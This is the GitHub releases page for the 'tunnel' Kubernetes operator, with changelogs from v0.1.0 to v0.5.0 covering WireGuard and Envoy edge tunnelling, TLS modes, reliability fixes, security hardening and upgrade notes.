Skip to content

Releases: achetronic/tunnel

v0.5.0

Choose a tag to compare

@achetronic achetronic released this 24 Jun 17:57
701a60f

Host-level performance tuning for the VPS data path.

Breaking changes

  • Boot service renamed wg-relay.service to tunnel-boot.service, since it now reapplies the whole node config on boot, not just WireGuard. The WireGuard interface stays wg-relay.

Features

  • New spec.host block to tune the VPS kernel and NIC, separate from the Envoy proxy config:
    • kernelMaxSocketBufferBytes (default 25MB): raises the kernel socket buffer ceiling and sets SO_RCVBUF/SO_SNDBUF on the UDP listeners. UDP needs this set explicitly; TCP keeps autotuning.
    • disableNicOffloads (default false): turns GRO/GSO off on the underlay NIC for encapsulated UDP (tunnel-in-tunnel), where receive coalescing corrupts datagram boundaries. The interface is detected automatically.
  • enable_reuse_port on all Envoy listeners so they spread across worker threads.

Changes

  • Removed prefer_gro from the Envoy UDP listeners; GRO is left to the OS, or turned off at the NIC via disableNicOffloads.
  • NIC offloads are applied natively without ethtool on the VPS, the same way WireGuard and nftables are handled.
  • New dependency: github.com/safchain/ethtool (Apache-2.0).

v0.4.0

Choose a tag to compare

@achetronic achetronic released this 23 Jun 20:52

Features

  • Enable UDP GRO (Generic Receive Offload) on the listener downstream socket for UDP listeners via prefer_gro: true in udp_listener_config.

v0.3.1

Choose a tag to compare

@achetronic achetronic released this 15 Jun 21:03

Moves the operator's internal ports out of the way of your traffic.

Changed

  • The uplink readiness/health endpoint moved from port 8080 to 40500, and the Envoy edge admin/metrics port moved from 9901 to 40600. Both were low ports that could clash with a port you expose through a PortBinding; the new ones sit in a high range where a collision is far less likely. These ports are reserved by the data path, so a PortBinding may not use them.

Upgrade note

The ports are hardcoded in this release. Existing EdgeNodes re-enroll cleanly and the uplink pods roll to the new readiness port on their own; no manual step beyond upgrading the chart and letting the operator reconcile.

v0.3.0

Choose a tag to compare

@achetronic achetronic released this 15 Jun 19:23

If you ran an earlier version, this one is much steadier under failure: reboots, restarts, scale-downs and bad input no longer leave things wedged.

Added

  • PortBinding now reports readiness honestly. Ready only turns true once the binding is actually live on the edge, not just queued.
  • New --leader-elect-namespace flag, so you can run the manager outside the cluster (for example with make run).
  • spec.uplink.namespace is now immutable, so changing it can't strand resources behind.

Fixed: control plane

  • The EdgeNode no longer reconciles itself in a loop, so it stops hammering the VPS over SSH.
  • Applied bindings are recorded as soon as enrollment succeeds, so a later hiccup can't leave a binding stuck as "not applied".
  • The manager skips status writes when nothing changed.
  • Uplink resources owned by another EdgeNode are left alone instead of being deleted.
  • Reconcile concurrency is bounded, and inputs are checked more strictly.

Fixed: data path (VPS)

  • A healthy uplink no longer gets dropped by its own health check. Each check now uses a fresh connection, which fixes spurious failures that could reset live traffic.
  • The generated Envoy config is now valid in all cases (proxy-protocol health checks, durations, TLS passthrough).
  • The tunnel survives a VPS reboot: WireGuard comes back before Envoy starts.
  • The uplink drains cleanly on shutdown, so rolling updates don't drop in-flight connections.
  • A pod only reports ready once WireGuard and nftables are actually applied and the handshake is fresh.
  • The first apply retries on failure instead of leaving a pod stuck not-ready.
  • Stale routes are cleaned up when you scale uplinks down.
  • A dead SSH connection can no longer freeze a worker.
  • Same port can be used for TCP and UDP at once.
  • VPS state now lives in /etc/tunnel (renamed from /etc/tunnel-operator).

Fixed: security

  • SSH host-key checking now verifies the key against the right host, not just any host in the file.
  • The Envoy version is validated before it ever reaches a shell command.
  • VPS binaries are called by absolute path.
  • The Envoy admin address follows your tunnel network, so a custom network no longer breaks enrollment.
  • uplink.replicas is capped to avoid a denial-of-service through key generation.

Testing

  • Rendered Envoy config is now checked against a real Envoy in CI (make test), catching problems plain text comparisons miss.

Docs

  • Refreshed the guides, the manager flags table in the README, and code comments.

Upgrade note

The VPS state directory was renamed from /etc/tunnel-operator to /etc/tunnel. There's no migration: an already-enrolled VPS simply re-enrolls itself cleanly on the next reconcile.

v0.2.0

Choose a tag to compare

@achetronic achetronic released this 11 Jun 21:55
4982f9a

What's new

  • Edge TLS certificates now rotate without downtime. When a certificate is renewed (for example by cert-manager), the operator updates Envoy on the VPS in place, with no dropped connections and no restart. Previously a renewed certificate was copied to the VPS but Envoy kept serving the old one until it expired, which could take a TLS listener down. If you use TLS offload or mutual mode, you no longer need to do anything on renewal.

Fixes

  • PortBindings no longer leak across namespaces. If you had two EdgeNodes with the same name in different namespaces, a PortBinding could be applied to the wrong one. Bindings are now matched by both name and namespace.
  • Private keys are cleaned up when you remove a TLS binding. Deleting a TLS PortBinding (or switching it away from offload/mutual) now removes its certificate and key from the VPS, instead of leaving them on disk until the node is deleted.

Upgrade notes

  • No configuration or CRD changes are required. After upgrading, EdgeNodes reconcile and move existing TLS bindings to the new mechanism automatically. Old certificate files left on the VPS by previous versions are cleaned up on the next reconcile.

v0.1.0

Choose a tag to compare

@achetronic achetronic released this 10 Jun 21:38

First release 🚀

Features

  • Two CRDs: EdgeNode (a VPS plus the tunnel) and PortBinding (the ports to expose).
  • Expose TCP and UDP ports, routed to a Kubernetes Service or a raw IP:port.
  • Active-active HA: N uplink replicas, Envoy L4 load-balancing on the VPS with active health checks per replica.
  • TLS at the edge: passthrough (SNI routing), offload (terminate on the VPS), mutual (downstream mTLS).
  • Client source IP preserved with Proxy Protocol.
  • WireGuard and nftables programmed natively by the tunnelctl agent: no wireguard-tools, wg-quick or nft CLI, distroless uplink. The operator is the single SSH writer, verifies the VPS host key, and stays out of the data path.
  • Multi-arch images (amd64/arm64).
  • Helm chart published as an OCI artifact